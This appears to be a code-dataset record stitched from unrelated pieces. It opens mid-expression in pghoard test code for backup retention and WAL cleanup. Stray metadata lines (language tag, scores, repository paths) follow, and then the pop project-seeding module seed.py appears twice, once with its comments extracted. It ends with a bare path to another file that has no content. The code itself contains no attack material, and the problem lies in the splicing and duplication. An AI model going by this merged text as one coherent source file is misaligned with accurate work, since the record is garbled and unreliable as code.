== "2015-07-02_9" assert basebackups[1]["name"] == "2015-07-02_10" assert basebackups[2]["name"] == "2015-07-03_0" def test_determine_backups_to_delete(self): now = datetime.datetime.now(datetime.timezone.utc) bbs = [ { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=10, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=9, hours=1) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=8, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=7, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=6, hours=20) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=5, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=4, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=3, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=2, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(days=1, hours=4) } }, { "name": "bb1", "metadata": { "start-time": now - datetime.timedelta(hours=4) } }, ] site_config = { "basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": 24, } bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 8 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of 
the backups are too old (start time + interval is over 8 days in the past) assert len(bbs_copy) == 10 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 9 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count trumps backup age and backups are removed even though they're not too old assert len(bbs_copy) == 9 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count"] = 16 site_config["basebackup_age_days_max"] = 2 site_config["basebackup_count_min"] = 6 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # basebackup_count_min ensures not that many backups are removed even though they're too old assert len(bbs_copy) == 6 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] site_config["basebackup_count_min"] = 2 bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) # 3 of the backups are new enough (start time less than 3 days in the past) assert len(bbs_copy) == 3 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] # Basebackups are disabled for this site (basebackup_interval_hours=None) # verify that determine_backups_to_delete still executes correctly site_config = {"basebackup_count": 4, "basebackup_count_min": 2, "basebackup_interval_hours": None} bbs_copy = list(bbs) to_delete = self.pghoard.determine_backups_to_delete(basebackups=bbs_copy, site_config=site_config) assert len(bbs_copy) == 4 assert len(to_delete) == len(bbs) - len(bbs_copy) assert to_delete == 
bbs[:len(to_delete)] assert bbs_copy == bbs[len(to_delete):] def test_local_refresh_backup_list_and_delete_old(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") wal_storage_path = os.path.join(self.local_storage_dir, "xlog") os.makedirs(basebackup_storage_path) os.makedirs(wal_storage_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_and_wal_files(what): for bb, wals in what.items(): if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) with open(bb_path, "wb") as fp: fp.write(b"something") with open(bb_path + ".metadata", "w") as fp: json.dump({ "start-wal-segment": wals[0], "start-time": start_time.isoformat(), }, fp) for wal in wals: with open(os.path.join(wal_storage_path, wal), "wb") as fp: fp.write(b"something") backups_and_wals = { "2015-08-25_0": [ # NOTE: gap between this and next segment means that cleanup shouldn't find this "000000010000000A000000FB", ], "2015-08-25_1": [ "000000020000000A000000FD", "000000020000000A000000FE", ], "2015-08-25_2": [ "000000030000000A000000FF", "000000030000000B00000000", "000000030000000B00000001", "000000040000000B00000002", ], "2015-08-25_3": [ # Both of these should be saved "000000040000000B00000003", "000000040000000B00000004", ], } write_backup_and_wal_files(backups_and_wals) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 3 # Put all WAL segments between 1 and 9 in place to see that they're deleted and we don't try to go back # any further from TLI 1. 
Note that timeline 3 is now "empty" so deletion shouldn't touch timelines 2 # or 1. new_backups_and_wals = { "": [ "000000020000000A000000FC", "000000020000000A000000FD", "000000020000000A000000FE", "000000020000000A000000FF", "000000020000000B00000000", "000000020000000B00000001", "000000020000000B00000002", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(new_backups_and_wals) assert len(os.listdir(wal_storage_path)) == 11 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 expected_wal_count = len(backups_and_wals["2015-08-25_0"]) expected_wal_count += len(new_backups_and_wals[""]) expected_wal_count += len(new_backups_and_wals["2015-08-25_4"]) assert len(os.listdir(wal_storage_path)) == expected_wal_count # Now put WAL files in place with no gaps anywhere gapless_backups_and_wals = { "2015-08-25_3": [ "000000030000000B00000003", "000000040000000B00000004", ], "2015-08-25_4": [ "000000040000000B00000005", ], } write_backup_and_wal_files(gapless_backups_and_wals) assert len(os.listdir(wal_storage_path)) >= 10 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 assert len(os.listdir(wal_storage_path)) == 1 def test_local_refresh_backup_list_and_delete_old_delta_format(self): basebackup_storage_path = os.path.join(self.local_storage_dir, "basebackup") basebackup_delta_path = os.path.join(self.local_storage_dir, "basebackup_delta") os.makedirs(basebackup_storage_path) os.makedirs(basebackup_delta_path) self.pghoard.set_state_defaults(self.test_site) assert self.pghoard.get_remote_basebackups_info(self.test_site) == [] def write_backup_files(what): for bb, bb_data in what.items(): wal_start, hexdigests = bb_data if bb: bb_path = os.path.join(basebackup_storage_path, bb) date_parts = [int(part) for part in 
bb.replace("_", "-").split("-")] start_time = datetime.datetime(*date_parts, tzinfo=datetime.timezone.utc) metadata = { "manifest": { "snapshot_result": { "state": { "files": [{ "relative_path": h, "hexdigest": h } for h in hexdigests] } } } } mtime = time.time() blob = io.BytesIO(common.json_encode(metadata, binary=True)) ti = tarfile.TarInfo(name=".pghoard_tar_metadata.json") ti.size = len(blob.getbuffer()) ti.mtime = mtime with open(bb_path, "wb") as fp: with rohmufile.file_writer( compression_algorithm="snappy", compression_level=0, fileobj=fp ) as output_obj: with tarfile.TarFile(fileobj=output_obj, mode="w") as tar: tar.addfile(ti, blob) input_size = output_obj.tell() for h in hexdigests: with open(Path(basebackup_delta_path) / h, "w") as digest_file, \ open((Path(basebackup_delta_path) / (h + ".metadata")), "w") as digest_meta_file: json.dump({}, digest_file) json.dump({}, digest_meta_file) with open(bb_path + ".metadata", "w") as fp: json.dump({ "start-wal-segment": wal_start, "start-time": start_time.isoformat(), "format": BaseBackupFormat.delta_v1, "compression-algorithm": "snappy", "original-file-size": input_size }, fp) backups_and_delta = { "2015-08-25_0": ( "000000010000000A000000AA", [ "<KEY>", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855" ] ), "2015-08-25_1": [ "000000020000000A000000AB", ["<KEY>"] ], "2015-08-25_2": [ "000000030000000A000000AC", ["214967296374cae6f099e19910b33a0893f0abc62f50601baa2875ab055cd27b"] ], "2015-08-25_3": [ "000000040000000B00000003", [ "<KEY>", "<KEY>" ] ], } write_backup_files(backups_and_delta) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 4 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "<KEY>", 
"<KEY>" ] new_delta_data = { "2015-08-25_4": ( "000000040000000B00000004", [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] ) } write_backup_files(new_delta_data) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 2 self.pghoard.refresh_backup_list_and_delete_old(self.test_site) basebackups = self.pghoard.get_remote_basebackups_info(self.test_site) assert len(basebackups) == 1 left_delta_files = [p for p in os.listdir(basebackup_delta_path) if not p.endswith(".metadata")] assert sorted(left_delta_files) == [ "fc61c91430dcb345001306ad513f103380c16896093a17868fc909aeda393559", ] def test_alert_files(self): alert_file_path = os.path.join(self.config["alert_file_dir"], "test_alert") create_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is True delete_alert_file(self.pghoard.config, "test_alert") assert os.path.exists(alert_file_path) is False def test_backup_state_file(self): self.pghoard.write_backup_state_to_json_file() state_path = self.config["json_state_file_path"] with open(state_path, "r") as fp: state = json.load(fp) empty_state = { "startup_time": self.pghoard.state["startup_time"], "backup_sites": {}, "compressors": [{}] * self.config["compression"]["thread_count"], "queues": { "compression_queue": 0, "transfer_queue": 0, }, "served_files": {}, "transfer_agent_state": {}, "pg_receivexlogs": {}, "pg_basebackups": {}, "walreceivers": {}, } assert empty_state == state def test_startup_walk_for_missed_compressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) with open(os.path.join(compressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "0000000F.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, 
"0000000F.history.metadata"), "wb") as fp: fp.write(b"{}") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") with open(os.path.join(compressed_wal_path, "000000010000000000000004xyz.metadata"), "wb") as fp: fp.write(b"{}") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 0 assert self.pghoard.transfer_queue.qsize() == 2 def test_startup_walk_for_missed_uncompressed_files(self): compressed_wal_path, _ = self.pghoard.create_backup_site_paths(self.test_site) uncompressed_wal_path = compressed_wal_path + "_incoming" with open(os.path.join(uncompressed_wal_path, "000000010000000000000004"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "00000002.history"), "wb") as fp: fp.write(b"foo") with open(os.path.join(uncompressed_wal_path, "000000010000000000000004xyz"), "wb") as fp: fp.write(b"foo") self.pghoard.startup_walk_for_missed_files() assert self.pghoard.compression_queue.qsize() == 2 assert self.pghoard.transfer_queue.qsize() == 0 class TestPGHoardWithPG: def test_auth_alert_files(self, db, pghoard): def clean_alert_files(): for f in os.listdir(pghoard.config["alert_file_dir"]): os.unlink(os.path.join(pghoard.config["alert_file_dir"], f)) # connecting using the proper user should work and not yield any alerts clean_alert_files() conn_str = create_connection_string(db.user) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is not None assert os.listdir(pghoard.config["alert_file_dir"]) == [] # nonexistent user should yield a configuration error # Make sure we're not caching the pg_version del pghoard.config["backup_sites"][pghoard.test_site]["pg_version"] clean_alert_files() conn_str = create_connection_string(dict(db.user, user="nonexistent")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # so should the disabled 
user clean_alert_files() conn_str = create_connection_string(dict(db.user, user="disabled")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["configuration_error"] # existing user with an invalid password should cause an authentication error clean_alert_files() conn_str = create_connection_string(dict(db.user, user="<PASSWORD>")) assert pghoard.check_pg_server_version(conn_str, pghoard.test_site) is None assert os.listdir(pghoard.config["alert_file_dir"]) == ["authentication_error"] def test_pause_on_disk_full(self, db, pghoard_separate_volume, caplog): pghoard = pghoard_separate_volume conn = db.connect() conn.autocommit = True wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) # Create 15 new WAL segments in very quick succession. Our volume for incoming WALs is only 150 # MiB so if logic for automatically suspending pg_receive(xlog|wal) wasn't working the volume # would certainly fill up and the files couldn't be processed. Now this should work fine. 
for _ in range(16): # Note: do not combine two function call in one select, PG executes it differently and # sometimes looks like it generates less WAL files than we wanted switch_wal(conn) conn.close() wait_for_xlog(pghoard, 15) assert "pausing pg_receive(wal|xlog)" in caplog.text def test_surviving_pg_receivewal_hickup(self, db, pghoard): wal_directory = os.path.join(pghoard.config["backup_location"], pghoard.test_site, "xlog_incoming") os.makedirs(wal_directory, exist_ok=True) pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) conn = db.connect() conn.autocommit = True # Make sure we have already a few files so pg_receivewal has something to start from when it eventually restarts # +1: to finish the current one for _ in range(3 + 1): switch_wal(conn) wait_for_xlog(pghoard, 3) # stop pg_receivewal so we cannot process new WAL segments pghoard.receivexlogs[pghoard.test_site].running = False if pghoard.receivexlogs[pghoard.test_site].is_alive(): pghoard.receivexlogs[pghoard.test_site].join() del pghoard.receivexlogs[pghoard.test_site] n_xlogs = pghoard.transfer_agent_state[pghoard.test_site]["upload"]["xlog"]["xlogs_since_basebackup"] # add more WAL segments for _ in range(10): switch_wal(conn) conn.close() # restart pghoard.receivexlog_listener(pghoard.test_site, db.user, wal_directory) assert pghoard.receivexlogs[pghoard.test_site].is_alive() # We should now process all created segments, not only the ones which were created after pg_receivewal was restarted wait_for_xlog(pghoard, n_xlogs + 10)
en
0.942438
pghoard Copyright (c) 2015 Ohmu Ltd See LICENSE for details # pylint: disable=attribute-defined-outside-init # This is the "final storage location" when using "local" storage type \ systemid|6222667313856416063 timeline|1 xlogpos|0/B003760 dbname| # Handle case where metadata file does not exist # 3 of the backups are too old (start time + interval is over 8 days in the past) # basebackup_count trumps backup age and backups are removed even though they're not too old # basebackup_count_min ensures not that many backups are removed even though they're too old # 3 of the backups are new enough (start time less than 3 days in the past) # Basebackups are disabled for this site (basebackup_interval_hours=None) # verify that determine_backups_to_delete still executes correctly # NOTE: gap between this and next segment means that cleanup shouldn't find this # Both of these should be saved # Put all WAL segments between 1 and 9 in place to see that they're deleted and we don't try to go back # any further from TLI 1. Note that timeline 3 is now "empty" so deletion shouldn't touch timelines 2 # or 1. # Now put WAL files in place with no gaps anywhere # connecting using the proper user should work and not yield any alerts # nonexistent user should yield a configuration error # Make sure we're not caching the pg_version # so should the disabled user # existing user with an invalid password should cause an authentication error # Create 15 new WAL segments in very quick succession. Our volume for incoming WALs is only 150 # MiB so if logic for automatically suspending pg_receive(xlog|wal) wasn't working the volume # would certainly fill up and the files couldn't be processed. Now this should work fine. 
# Note: do not combine two function call in one select, PG executes it differently and # sometimes looks like it generates less WAL files than we wanted # Make sure we have already a few files so pg_receivewal has something to start from when it eventually restarts # +1: to finish the current one # stop pg_receivewal so we cannot process new WAL segments # add more WAL segments # restart # We should now process all created segments, not only the ones which were created after pg_receivewal was restarted
2.163243
2
pop/mods/pop/seed.py
smokeytheblair/pop
48
6627911
''' Seed a new project with a directory tree and first files ''' # Import python libs import os SETUP = '''#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Import python libs import os import sys import shutil from setuptools import setup, Command NAME = '%%NAME%%' DESC = ('') # Version info -- read without importing _locals = {} with open('{}/version.py'.format(NAME)) as fp: exec(fp.read(), None, _locals) VERSION = _locals['version'] SETUP_DIRNAME = os.path.dirname(__file__) if not SETUP_DIRNAME: SETUP_DIRNAME = os.getcwd() with open('README.rst', encoding='utf-8') as f: LONG_DESC = f.read() with open('requirements.txt') as f: REQUIREMENTS = f.read().splitlines() class Clean(Command): user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): for subdir in (NAME, 'tests'): for root, dirs, files in os.walk(os.path.join(os.path.dirname(__file__), subdir)): for dir_ in dirs: if dir_ == '__pycache__': shutil.rmtree(os.path.join(root, dir_)) def discover_packages(): modules = [] for package in (NAME, ): for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, package)): pdir = os.path.relpath(root, SETUP_DIRNAME) modname = pdir.replace(os.sep, '.') modules.append(modname) return modules setup(name=NAME, author='', author_email='', url='', version=VERSION, install_requires=REQUIREMENTS, description=DESC, long_description=LONG_DESC, long_description_content_type='text/x-rst', python_requires='>=3.6', classifiers=[ 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Development Status :: 5 - Production/Stable', ], packages=discover_packages(), %%ENTRY%% cmdclass={'clean': Clean}, ) ''' ENTRY = '''entry_points={ 'console_scripts': [ '%%NAME%% = %%NAME%%.scripts:start', ], },''' SCRIPT = '''#!/usr/bin/env python3 import pop.hub def start(): hub = pop.hub.Hub() 
hub.pop.sub.add(dyne_name='%%NAME%%') hub.%%NAME%%.init.run() ''' INIT = '''def __init__(hub): # Remmeber not to start your app in the __init__ function # This function should just be used to set up the plugin subsystem # Add another function to call from your run.py to start the app pass def run(hub): hub.pop.conf.integrate(['%%NAME%%'], cli='%%NAME%%', roots=True, loader='yaml') print('%%NAME%% works!') ''' REQ = 'pop\n' CONF = '''CLI_CONFIG = {} CONFIG = {} GLOBAL = {} SUBS = {} DYNE = { '%%NAME%%': ['%%NAME%%'], %%DYNE%%} ''' VER = "version = '1'\n" def new(hub): ''' Given the option in hub.opts "seed_name" create a directory tree for a new pop project ''' hub.PATH = os.getcwd() name = hub.opts['seed_name'] for dyne in hub.opts['dyne']: hub.pop.seed.mkdir(name, dyne) hub.pop.seed.mkdir(name, dyne, 'contracts') if hub.opts['type'] == 'v': hub.pop.seed.mkdir(name) hub.pop.seed.mksetup(name, entry=False) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkreadme(name) else: hub.pop.seed.mkdir(name, name) hub.pop.seed.mkdir(name, name, 'contracts') hub.pop.seed.mksetup(name) hub.pop.seed.mkscript(name) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkrun(name) hub.pop.seed.mkinit(name) hub.pop.seed.mkreadme(name) def mkdir(hub, *args): ''' Create the named dir ''' path = hub.PATH for dir_ in args: path = os.path.join(path, dir_) if not os.path.isdir(path): try: os.makedirs(path) except Exception: print('Failed to make {}'.format(path)) continue if dir_ == 'scripts' and len(args) == 1: continue def mkreq(hub, name): ''' ''' path = os.path.join(hub.PATH, 'requirements.txt') with open(path, 'w+') as fp: fp.write(REQ) def mksetup(hub, name, entry=True): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'setup.py') setup_str = SETUP.replace('%%NAME%%', name) if entry: setup_str = setup_str.replace('%%ENTRY%%', ENTRY.replace('%%NAME%%', name)) else: setup_str 
= setup_str.replace('%%ENTRY%%', '') with open(path, 'w+') as fp: fp.write(setup_str) def mkscript(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, name, 'scripts.py') script_str = SCRIPT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(script_str) def mkrun(hub, name): ''' Create the convenience run.py script allowing the project to be executed from the local directory ''' path = os.path.join(hub.PATH, 'run.py') run_str = SCRIPT.replace('%%NAME%%', name) run_str += '\n\nstart()' with open(path, 'w+') as fp: fp.write(run_str) def mkinit(hub, name): ''' Create the intial init.py ''' path = os.path.join(hub.PATH, name, name, 'init.py') init_str = INIT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(init_str) def mkversion(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'version.py') with open(path, 'w+') as fp: fp.write(VER) def mkconf(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'conf.py') dyne_str = '' for dyne in hub.opts['dyne']: dyne_str += f" '{dyne}': ['{dyne}'],\n" conf_str = CONF.replace('%%NAME%%', name) conf_str = conf_str.replace('%%DYNE%%', dyne_str) with open(path, 'w+') as fp: fp.write(conf_str) def mkreadme(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'README.rst') eqchars = '=' * len(name) readme_str = f'{eqchars}\n{name.upper()}\n{eqchars}\n' with open(path, 'w+') as fp: fp.write(readme_str)
''' Seed a new project with a directory tree and first files ''' # Import python libs import os SETUP = '''#!/usr/bin/env python3 # -*- coding: utf-8 -*- # Import python libs import os import sys import shutil from setuptools import setup, Command NAME = '%%NAME%%' DESC = ('') # Version info -- read without importing _locals = {} with open('{}/version.py'.format(NAME)) as fp: exec(fp.read(), None, _locals) VERSION = _locals['version'] SETUP_DIRNAME = os.path.dirname(__file__) if not SETUP_DIRNAME: SETUP_DIRNAME = os.getcwd() with open('README.rst', encoding='utf-8') as f: LONG_DESC = f.read() with open('requirements.txt') as f: REQUIREMENTS = f.read().splitlines() class Clean(Command): user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): for subdir in (NAME, 'tests'): for root, dirs, files in os.walk(os.path.join(os.path.dirname(__file__), subdir)): for dir_ in dirs: if dir_ == '__pycache__': shutil.rmtree(os.path.join(root, dir_)) def discover_packages(): modules = [] for package in (NAME, ): for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, package)): pdir = os.path.relpath(root, SETUP_DIRNAME) modname = pdir.replace(os.sep, '.') modules.append(modname) return modules setup(name=NAME, author='', author_email='', url='', version=VERSION, install_requires=REQUIREMENTS, description=DESC, long_description=LONG_DESC, long_description_content_type='text/x-rst', python_requires='>=3.6', classifiers=[ 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Development Status :: 5 - Production/Stable', ], packages=discover_packages(), %%ENTRY%% cmdclass={'clean': Clean}, ) ''' ENTRY = '''entry_points={ 'console_scripts': [ '%%NAME%% = %%NAME%%.scripts:start', ], },''' SCRIPT = '''#!/usr/bin/env python3 import pop.hub def start(): hub = pop.hub.Hub() 
hub.pop.sub.add(dyne_name='%%NAME%%') hub.%%NAME%%.init.run() ''' INIT = '''def __init__(hub): # Remmeber not to start your app in the __init__ function # This function should just be used to set up the plugin subsystem # Add another function to call from your run.py to start the app pass def run(hub): hub.pop.conf.integrate(['%%NAME%%'], cli='%%NAME%%', roots=True, loader='yaml') print('%%NAME%% works!') ''' REQ = 'pop\n' CONF = '''CLI_CONFIG = {} CONFIG = {} GLOBAL = {} SUBS = {} DYNE = { '%%NAME%%': ['%%NAME%%'], %%DYNE%%} ''' VER = "version = '1'\n" def new(hub): ''' Given the option in hub.opts "seed_name" create a directory tree for a new pop project ''' hub.PATH = os.getcwd() name = hub.opts['seed_name'] for dyne in hub.opts['dyne']: hub.pop.seed.mkdir(name, dyne) hub.pop.seed.mkdir(name, dyne, 'contracts') if hub.opts['type'] == 'v': hub.pop.seed.mkdir(name) hub.pop.seed.mksetup(name, entry=False) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkreadme(name) else: hub.pop.seed.mkdir(name, name) hub.pop.seed.mkdir(name, name, 'contracts') hub.pop.seed.mksetup(name) hub.pop.seed.mkscript(name) hub.pop.seed.mkversion(name) hub.pop.seed.mkconf(name) hub.pop.seed.mkreq(name) hub.pop.seed.mkrun(name) hub.pop.seed.mkinit(name) hub.pop.seed.mkreadme(name) def mkdir(hub, *args): ''' Create the named dir ''' path = hub.PATH for dir_ in args: path = os.path.join(path, dir_) if not os.path.isdir(path): try: os.makedirs(path) except Exception: print('Failed to make {}'.format(path)) continue if dir_ == 'scripts' and len(args) == 1: continue def mkreq(hub, name): ''' ''' path = os.path.join(hub.PATH, 'requirements.txt') with open(path, 'w+') as fp: fp.write(REQ) def mksetup(hub, name, entry=True): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'setup.py') setup_str = SETUP.replace('%%NAME%%', name) if entry: setup_str = setup_str.replace('%%ENTRY%%', ENTRY.replace('%%NAME%%', name)) else: setup_str 
= setup_str.replace('%%ENTRY%%', '') with open(path, 'w+') as fp: fp.write(setup_str) def mkscript(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, name, 'scripts.py') script_str = SCRIPT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(script_str) def mkrun(hub, name): ''' Create the convenience run.py script allowing the project to be executed from the local directory ''' path = os.path.join(hub.PATH, 'run.py') run_str = SCRIPT.replace('%%NAME%%', name) run_str += '\n\nstart()' with open(path, 'w+') as fp: fp.write(run_str) def mkinit(hub, name): ''' Create the intial init.py ''' path = os.path.join(hub.PATH, name, name, 'init.py') init_str = INIT.replace('%%NAME%%', name) with open(path, 'w+') as fp: fp.write(init_str) def mkversion(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'version.py') with open(path, 'w+') as fp: fp.write(VER) def mkconf(hub, name): ''' Create the version.py file ''' path = os.path.join(hub.PATH, name, 'conf.py') dyne_str = '' for dyne in hub.opts['dyne']: dyne_str += f" '{dyne}': ['{dyne}'],\n" conf_str = CONF.replace('%%NAME%%', name) conf_str = conf_str.replace('%%DYNE%%', dyne_str) with open(path, 'w+') as fp: fp.write(conf_str) def mkreadme(hub, name): ''' Create and write out a setup.py file ''' path = os.path.join(hub.PATH, 'README.rst') eqchars = '=' * len(name) readme_str = f'{eqchars}\n{name.upper()}\n{eqchars}\n' with open(path, 'w+') as fp: fp.write(readme_str)
en
0.487314
Seed a new project with a directory tree and first files # Import python libs #!/usr/bin/env python3 # -*- coding: utf-8 -*- # Import python libs import os import sys import shutil from setuptools import setup, Command NAME = '%%NAME%%' DESC = ('') # Version info -- read without importing _locals = {} with open('{}/version.py'.format(NAME)) as fp: exec(fp.read(), None, _locals) VERSION = _locals['version'] SETUP_DIRNAME = os.path.dirname(__file__) if not SETUP_DIRNAME: SETUP_DIRNAME = os.getcwd() with open('README.rst', encoding='utf-8') as f: LONG_DESC = f.read() with open('requirements.txt') as f: REQUIREMENTS = f.read().splitlines() class Clean(Command): user_options = [] def initialize_options(self): pass def finalize_options(self): pass def run(self): for subdir in (NAME, 'tests'): for root, dirs, files in os.walk(os.path.join(os.path.dirname(__file__), subdir)): for dir_ in dirs: if dir_ == '__pycache__': shutil.rmtree(os.path.join(root, dir_)) def discover_packages(): modules = [] for package in (NAME, ): for root, _, files in os.walk(os.path.join(SETUP_DIRNAME, package)): pdir = os.path.relpath(root, SETUP_DIRNAME) modname = pdir.replace(os.sep, '.') modules.append(modname) return modules setup(name=NAME, author='', author_email='', url='', version=VERSION, install_requires=REQUIREMENTS, description=DESC, long_description=LONG_DESC, long_description_content_type='text/x-rst', python_requires='>=3.6', classifiers=[ 'Operating System :: OS Independent', 'Programming Language :: Python', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', 'Programming Language :: Python :: 3.8', 'Development Status :: 5 - Production/Stable', ], packages=discover_packages(), %%ENTRY%% cmdclass={'clean': Clean}, ) entry_points={ 'console_scripts': [ '%%NAME%% = %%NAME%%.scripts:start', ], }, #!/usr/bin/env python3 import pop.hub def start(): hub = pop.hub.Hub() hub.pop.sub.add(dyne_name='%%NAME%%') hub.%%NAME%%.init.run() def __init__(hub): # 
Remmeber not to start your app in the __init__ function # This function should just be used to set up the plugin subsystem # Add another function to call from your run.py to start the app pass def run(hub): hub.pop.conf.integrate(['%%NAME%%'], cli='%%NAME%%', roots=True, loader='yaml') print('%%NAME%% works!') CLI_CONFIG = {} CONFIG = {} GLOBAL = {} SUBS = {} DYNE = { '%%NAME%%': ['%%NAME%%'], %%DYNE%%} Given the option in hub.opts "seed_name" create a directory tree for a new pop project Create the named dir Create and write out a setup.py file Create and write out a setup.py file Create the convenience run.py script allowing the project to be executed from the local directory Create the intial init.py Create the version.py file Create the version.py file Create and write out a setup.py file
2.322806
2
server/user/lls.py
lingochamp/open-wechat-scorer
4
6627912
